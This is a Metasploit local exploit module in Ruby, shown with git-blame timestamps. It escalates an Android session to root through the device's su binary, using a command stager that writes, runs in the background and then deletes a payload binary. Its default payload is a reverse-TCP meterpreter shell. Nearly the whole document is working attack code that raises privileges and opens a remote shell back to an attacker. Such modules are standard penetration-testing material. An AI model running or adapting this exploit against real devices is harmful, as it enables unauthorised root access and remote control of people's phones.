2017-09-01 10:57:48 +08:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
class MetasploitModule < Msf::Exploit::Local
|
2018-05-07 18:29:54 +08:00
|
|
|
Rank = ManualRanking
|
2017-09-01 10:57:48 +08:00
|
|
|
|
|
|
|
|
include Msf::Exploit::CmdStager
|
2018-05-17 20:48:25 +08:00
|
|
|
include Msf::Post::File
|
|
|
|
|
include Msf::Post::Android::Priv
|
2017-09-01 10:57:48 +08:00
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super( update_info( info, {
|
|
|
|
|
'Name' => "Android 'su' Privilege Escalation",
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module uses the su binary present on rooted devices to run
|
|
|
|
|
a payload as root.
|
2018-05-07 18:29:54 +08:00
|
|
|
|
2018-05-17 20:48:25 +08:00
|
|
|
A rooted Android device will contain a su binary (often linked with
|
2018-05-07 18:29:54 +08:00
|
|
|
an application) that allows the user to run commands as root.
|
|
|
|
|
This module will use the su binary to execute a command stager
|
|
|
|
|
as root. The command stager will write a payload binary to a
|
|
|
|
|
temporary directory, make it executable, execute it in the background,
|
|
|
|
|
and finally delete the executable.
|
|
|
|
|
|
|
|
|
|
On most devices the su binary will pop-up a prompt on the device
|
|
|
|
|
asking the user for permission.
|
2017-09-01 10:57:48 +08:00
|
|
|
},
|
2019-03-29 10:44:58 -05:00
|
|
|
'Author' => 'timwr',
|
2017-09-01 10:57:48 +08:00
|
|
|
'License' => MSF_LICENSE,
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2017-08-31',
|
2018-05-06 14:28:34 +08:00
|
|
|
'SessionTypes' => [ 'meterpreter', 'shell' ],
|
2017-09-01 10:57:48 +08:00
|
|
|
'Platform' => [ 'android', 'linux' ],
|
2018-05-17 20:48:25 +08:00
|
|
|
'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
|
2017-09-01 10:57:48 +08:00
|
|
|
'Targets' => [
|
|
|
|
|
['aarch64',{'Arch' => ARCH_AARCH64}],
|
2018-05-06 14:28:34 +08:00
|
|
|
['armle', {'Arch' => ARCH_ARMLE}],
|
2017-09-01 10:57:48 +08:00
|
|
|
['x86', {'Arch' => ARCH_X86}],
|
|
|
|
|
['x64', {'Arch' => ARCH_X64}],
|
|
|
|
|
['mipsle', {'Arch' => ARCH_MIPSLE}]
|
|
|
|
|
],
|
2018-10-01 17:50:33 +08:00
|
|
|
'DefaultOptions' => {
|
|
|
|
|
'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
|
|
|
|
|
'WfsDelay' => 5,
|
|
|
|
|
},
|
2017-09-01 10:57:48 +08:00
|
|
|
'DefaultTarget' => 0,
|
|
|
|
|
}
|
|
|
|
|
))
|
|
|
|
|
register_options([
|
|
|
|
|
OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
|
|
|
|
|
OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
|
|
|
|
|
])
|
|
|
|
|
end
|
|
|
|
|
|
2018-05-17 20:48:25 +08:00
|
|
|
def base_dir
|
|
|
|
|
datastore['WritableDir'].to_s
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def su_bin
|
|
|
|
|
datastore['SU_BINARY'].to_s
|
|
|
|
|
end
|
|
|
|
|
|
2017-09-01 10:57:48 +08:00
|
|
|
def exploit
|
2018-05-17 20:48:25 +08:00
|
|
|
if is_root?
|
|
|
|
|
fail_with Failure::BadConfig, 'Session already has root privileges'
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
linemax = 4088 - su_bin.size
|
2017-09-01 10:57:48 +08:00
|
|
|
execute_cmdstager({
|
|
|
|
|
flavor: :echo,
|
|
|
|
|
enc_format: :octal,
|
|
|
|
|
prefix: '\\\\0',
|
2018-05-17 20:48:25 +08:00
|
|
|
temp: base_dir,
|
2017-09-01 10:57:48 +08:00
|
|
|
linemax: linemax,
|
|
|
|
|
background: true,
|
|
|
|
|
})
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def execute_command(cmd, opts)
|
2018-05-17 20:48:25 +08:00
|
|
|
su_cmd = "#{su_bin} -c '#{cmd}'"
|
2017-09-01 10:57:48 +08:00
|
|
|
cmd_exec(su_cmd)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
